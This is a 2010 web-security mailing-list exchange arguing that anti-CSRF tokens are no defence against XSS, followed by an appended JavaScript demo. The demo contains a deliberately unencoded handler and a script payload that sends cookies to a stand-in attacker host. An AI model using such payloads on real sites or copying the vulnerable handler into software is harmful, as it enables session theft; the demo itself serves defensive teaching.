[WEB SECURITY] Anti-CSRF measures will mitigate XSS

nilesh kumar nileshkumar83 at yahoo.co.in
Sat Jun 26 03:56:20 EDT 2010


Hi Lava,

> ClickJacking can be used to bypass Anti-CSRF measures in many instances.
> Tomorrow we might have a new technique to bypass CSRF countermeasures.

Good points. Exactly, I agree with you. We have also recommended the same thing: don't take chances, fix both issues.
Thanks for your comments!

Thanks & Regards,

Nilesh Kumar,

Security Analyst,
Honeywell, India

--- On Sat, 26/6/10, lavakumar kuppan <lavakumar.in at gmail.com> wrote:

From: lavakumar kuppan <lavakumar.in at gmail.com>
Subject: Re: [WEB SECURITY] Anti-CSRF measures will mitigate XSS
To: nileshkumar83 at yahoo.co.in
Cc: websecurity at webappsec.org
Date: Saturday, 26 June, 2010, 2:11 AM

Nilesh,
ClickJacking can be used to bypass Anti-CSRF measures in many instances.
Ref: http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html
http://www.contextis.co.uk/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf

So now, if your protection against XSS was only CSRF tokens, then by using ClickJacking an attacker can perform an XSS attack.
Tomorrow we might have a new technique to bypass CSRF countermeasures.


And every time that happens the application would be open to two attacks, CSRF as well as XSS.
Moreover, if the attacker can perform a Session fixation attack and use his session's Anti-CSRF tokens to perform XSS, the user would still be in trouble.

Because the attacker can then steal locally stored data - LSOs, cookies, LocalStorage, Web SQL Storage, Password Manager (http://ha.ckers.org/weird/xss-password-manager.html) etc.

And with all the Cross Domain communication possibilities in HTML5, the attacker could start attacking the other applications that communicate with the vulnerable application.

There have been some great points from others as well, and so far it's been an overwhelming NO to using Anti-CSRF for XSS protection.
Hope this gives enough reasons for the programmers to write a few extra lines of code to encode the user output ;)

Cheers,
Lava
http://www.andlabs.org
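The session-fixation scenario Lava describes above, as an added example that is not part of the original thread: a handler that treats its anti-CSRF token check as its XSS defence, next to the same handler with the output encoding Lava asks for. The session store, the handler names (greetTokenOnly, greetEncoded), the session IDs and the payload are all constructed for this illustration and are not from any real application.

```javascript
// Added example (not from the original thread): an anti-CSRF token check does
// not stop reflected XSS once the attacker can supply a token the server will
// accept; output encoding does. All names and data below are constructed.

// Hypothetical server-side session store: session id -> anti-CSRF token.
const sessions = new Map();

function createSession(sid, csrfToken) {
  sessions.set(sid, csrfToken);
}

function tokenValid(sid, params) {
  return sessions.has(sid) && sessions.get(sid) === params.csrf;
}

// "Protected" handler: refuses requests whose token does not match the
// session, then reflects the `name` parameter into HTML unencoded.
function greetTokenOnly(sid, params) {
  if (!tokenValid(sid, params)) {
    return { status: 403, body: 'bad token' };
  }
  return { status: 200, body: `<p>Hello, ${params.name}</p>` };
}

// Minimal HTML entity encoding for text placed in an element body.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened handler: keeps the token check (that is what stops CSRF) and
// additionally encodes the reflected value (that is what stops XSS).
function greetEncoded(sid, params) {
  if (!tokenValid(sid, params)) {
    return { status: 403, body: 'bad token' };
  }
  return { status: 200, body: `<p>Hello, ${htmlEncode(params.name)}</p>` };
}

// Constructed payload: would exfiltrate document.cookie if rendered raw.
const PAYLOAD =
  '<script>location="http://attacker.invalid/?c="+document.cookie</script>';

// Session fixation, as in the thread: the attacker obtains a session of his
// own, plants that session id on the victim's browser, and lures the victim
// to a URL carrying the attacker's own (valid) anti-CSRF token. The server
// sees a correct token for the session it was given and renders the payload.
function sessionFixationDemo() {
  createSession('attacker-sid', 'tok-attacker');
  const victimRequest = { csrf: 'tok-attacker', name: PAYLOAD };
  return {
    tokenOnly: greetTokenOnly('attacker-sid', victimRequest),
    encoded: greetEncoded('attacker-sid', victimRequest),
  };
}

// For contrast, a plain cross-site request with a guessed token is refused by
// both handlers; this is the one thing the token is actually good for.
function crossSiteWithoutToken() {
  createSession('victim-sid', 'tok-victim');
  return greetTokenOnly('victim-sid', { csrf: 'guess', name: PAYLOAD });
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = sessionFixationDemo();
  console.log('token-only handler:', r.tokenOnly.body);
  console.log('encoded handler:   ', r.encoded.body);
  console.log('no valid token:    ', crossSiteWithoutToken().status);
}
```

The clickjacking variant Lava cites ends the same way: there the victim's own browser submits the victim's own token from a framed page, so the check passes for the same reason, and again only the encoding in greetEncoded keeps the payload inert.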